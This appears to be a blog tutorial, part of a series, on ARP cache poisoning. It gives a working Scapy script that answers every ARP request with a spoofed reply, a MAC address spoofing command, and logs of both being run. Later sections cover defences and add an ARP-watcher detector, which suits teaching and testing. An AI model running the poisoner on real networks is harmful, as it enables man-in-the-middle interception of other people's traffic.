    A stealth scan, or half-open scan, is one of the scanning methods in Nmap that intruders use to bypass firewalls and authentication mechanisms. With this method the scan looks like normal network traffic, and thus the scan stays hidden.



    We will write a program that waits for ARP requests and sends a spoofed ARP response for every received request. In a switched environment this results in every connection flowing over the computer of the attacker, because every ARP cache will hold the attacker's MAC for every IP address. This solution is more elegant and not as noisy as the one before, but still quite easy to detect for a trained admin. The spoofed response packet gets sent in parallel to the response of the real host, as illustrated in Fig a.png. The computer whose packet arrives first at the victim's network card wins.






    MAC Address change


    Every network card in an Ethernet network has a MAC address that is world-wide unique and is used to address devices on the network. The MAC address consists of six two-digit hexadecimal numbers separated by colons (e.g. aa:bb:cc:11:22:33).

    It's a common misbelief that a computer in a local TCP/IP network is reached over its IP address; in reality the MAC address is used for this purpose. Another common misunderstanding is that the MAC address cannot be spoofed. The operating system is responsible for writing the MAC into the Ethernet header, and systems like GNU/Linux or *BSD can change the MAC with a single command from their base system.


    Also read - https://www.kumaratuljaiswal.in/2020/04/how-to-change-mac-address-with-mac.html



    Changing the MAC address (before / after):


    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/kumaratuljaiswal.in]
    └─$ ifconfig
    eth0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
            ether b4:b6:86:47:55:83  txqueuelen 1000  (Ethernet)
            RX packets 0  bytes 0 (0.0 B)
            RX errors 0  dropped 0  overruns 0  frame 0
            TX packets 0  bytes 0 (0.0 B)
            TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
    
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/kumaratuljaiswal.in]
    └─$ sudo ifconfig eth0 hw ether c0:de:de:ad:be:e
    
    [sudo] password for hackerboy: 
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/kumaratuljaiswal.in]
    └─$ 
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/kumaratuljaiswal.in]
    └─$ ifconfig                                    
    eth0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
            ether c0:de:de:ad:be:0e  txqueuelen 1000  (Ethernet)
            RX packets 0  bytes 0 (0.0 B)
            RX errors 0  dropped 0  overruns 0  frame 0
            TX packets 0  bytes 0 (0.0 B)
            TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
    
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/kumaratuljaiswal.in]
    └─$ 
    
    



    Here is the program that waits for ARP requests and answers every received request with a spoofed ARP response:

     


    import sys
    from scapy.all import sniff, sendp, ARP, Ether

    # Exactly one argument is expected: the interface to listen and send on.
    if len(sys.argv) != 2:
        print(sys.argv[0] + " <iface>")
        sys.exit(1)


    def arp_poison_callback(packet):
        # Opcode 1 is an ARP request ("who-has"); only those get an answer.
        if packet[ARP].op == 1:
            # Ethernet and ARP source addresses are left unset so that Scapy
            # fills in the MAC of the sending interface.
            answer = Ether(dst=packet[ARP].hwsrc) / ARP()
            answer[ARP].op = "is-at"
            answer[ARP].hwdst = packet[ARP].hwsrc
            answer[ARP].psrc = packet[ARP].pdst
            answer[ARP].pdst = packet[ARP].psrc

            print("Fooling " + packet[ARP].psrc + " that " + packet[ARP].pdst + " is me")
            sendp(answer, iface=sys.argv[1])


    # Read ARP frames from the interface forever and hand each one to the callback.
    sniff(prn=arp_poison_callback,
          filter="arp",
          iface=sys.argv[1],
          store=0)




    The function sniff() reads packets in an endless loop from the interface specified by the parameter iface. The received packets are automatically filtered by the PCAP filter arp, which guarantees that our callback function arp_poison_callback will only get called with ARP packets as input. Due to the parameter store=0 the packet is only kept in memory and not written to the hard disk. The function arp_poison_callback() handles the real work of our program.

    First of all it checks the OP code of the ARP packet: when it is 1 the packet is an ARP request, and we generate a response packet that has the source MAC and IP of the request packet as destination MAC and IP. We don't define a source MAC, so Scapy automatically inserts the addresses of the sending network interface.



    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
    └─$ sudo python3 arpcache-2.py wlan0 
    Fooling 192.168.122.45 that 192.168.122.158 is me
    .
    Sent 1 packets.
    Fooling 192.168.122.158 that 192.168.122.25 is me
    .
    Sent 1 packets.
    Fooling 192.168.122.45 that 192.168.122.158 is me
    .
    Sent 1 packets.
    Fooling 192.168.122.45 that 192.168.122.158 is me
    .
    Sent 1 packets.
    Fooling 192.168.122.158 that 192.168.122.25 is me
    .
    Sent 1 packets.
    Fooling 192.168.122.45 that 192.168.122.158 is me
    .
    Sent 1 packets.
    ^C
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
    └─$ 





    The IP-to-MAC resolution of ARP gets cached for some time, because it would be dumb to ask for the resolution of the same address over and over again. This ARP cache can be displayed with the following command.



    arp -an



    It depends on the operating system, its version and local configuration settings on how long addresses will get cached.

     

     

    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
    └─$ arp -an
    ? (192.168.122.158) at e6:e4:e4:95:1e:27 [ether] on wlan0
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
    └─$ 



    To defend against ARP poisoning attacks one could, on the one hand, use static ARP entries, but depending on the ARP handling code of the operating system those can still get overwritten by received ARP responses; on the other hand one could use a tool such as an ARP watcher.

    An ARP watcher keeps an eye on the ARP traffic and reports suspicious behaviour, but it will not prevent it. Nowadays most modern Intrusion Detection Systems can detect ARP cache poisoning attacks. You should check the functionality of your IDS by using the above scripts to see how it behaves.
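As an added example (not the author's code), here is a minimal ARP watcher of the kind described above: it parses raw Ethernet/ARP frames without Scapy, learns the IP-to-MAC mapping from the first reply it sees, and raises an alert for a reply that nobody asked for (the second racer from the scenario above), for a MAC that changes for a known IP, and for one MAC answering for several IPs. The traffic in sample_attack() is constructed; its MACs reuse the values shown in the ifconfig and arp -an output above, and the client MAC 02:00:00:00:00:45 is made up.

```python
import struct
ETH_P_ARP, ARP_REQUEST, ARP_REPLY = 0x0806, 1, 2
mac_bytes = lambda m: bytes.fromhex(m.replace(":", ""))
ip_bytes = lambda ip: bytes(int(o) for o in ip.split("."))
mac_str = lambda b: ":".join(f"{x:02x}" for x in b)
ip_str = lambda b: ".".join(str(x) for x in b)

def build_arp(op, sha, spa, tha, tpa):   # Ethernet II + ARP frame; used only to build samples
    dst = "ff:ff:ff:ff:ff:ff" if op == ARP_REQUEST else tha
    hdr = mac_bytes(dst) + mac_bytes(sha) + struct.pack("!HHHBBH", ETH_P_ARP, 1, 0x0800, 6, 4, op)
    return hdr + mac_bytes(sha) + ip_bytes(spa) + mac_bytes(tha) + ip_bytes(tpa)

def parse_arp(frame):   # fields of an Ethernet/IPv4 ARP frame, None for anything else
    if len(frame) < 42 or struct.unpack("!HHHBB", frame[12:20]) != (ETH_P_ARP, 1, 0x0800, 6, 4):
        return None
    return {"op": struct.unpack("!H", frame[20:22])[0], "sha": mac_str(frame[22:28]),
            "spa": ip_str(frame[28:32]), "tha": mac_str(frame[32:38]), "tpa": ip_str(frame[38:42])}

class ArpWatcher:   # learns IP->MAC from replies and reports what a poisoner produces
    def __init__(self):
        self.table, self.pending, self.claims = {}, set(), {}

    def observe(self, frame):
        a = parse_arp(frame)
        if a is None:
            return []
        if a["op"] == ARP_REQUEST:                 # remember who asked for what
            self.pending.add((a["spa"], a["tpa"]))
            return []
        alerts, mac, ip = [], a["sha"], a["spa"]
        if (a["tpa"], ip) in self.pending:         # first answer to a real question
            self.pending.discard((a["tpa"], ip))
        else:                                      # nobody asked, or a second racer
            alerts.append(f"unsolicited reply: {ip} is-at {mac}")
        known = self.table.setdefault(ip, mac)     # first mapping seen is trusted
        if known != mac:
            alerts.append(f"mac changed for {ip}: {known} -> {mac}")
        self.claims.setdefault(mac, set()).add(ip)
        if len(self.claims[mac]) > 1:              # one card answering for many hosts
            alerts.append(f"{mac} claims {len(self.claims[mac])} ips")
        return alerts

def sample_attack():   # constructed sample; MACs reuse the page's own ifconfig/arp output
    real, rogue, client = "e6:e4:e4:95:1e:27", "c0:de:de:ad:be:0e", "02:00:00:00:00:45"
    zero, c, s, gw = "00:00:00:00:00:00", "192.168.122.45", "192.168.122.158", "192.168.122.1"
    frames = [build_arp(ARP_REQUEST, client, c, zero, s), build_arp(ARP_REPLY, real, s, client, c),
              build_arp(ARP_REPLY, rogue, s, client, c), build_arp(ARP_REQUEST, client, c, zero, gw),
              build_arp(ARP_REPLY, rogue, gw, client, c)]
    w = ArpWatcher()
    return [w.observe(f) for f in frames]          # one alert list per frame
```

On a switched network a passive watcher only sees the unicast replies addressed to its own host (or mirrored to its port), so run it on the host you want to protect or feed it frames from a SPAN port. To run it live, pass each raw frame from an AF_PACKET socket, or from Scapy's sniff(prn=...) callback via bytes(pkt), through observe().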

     

    To be Continued......



    Disclaimer

     

    All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. We do not include any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly advise against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or incite any illegal activity or hacking.


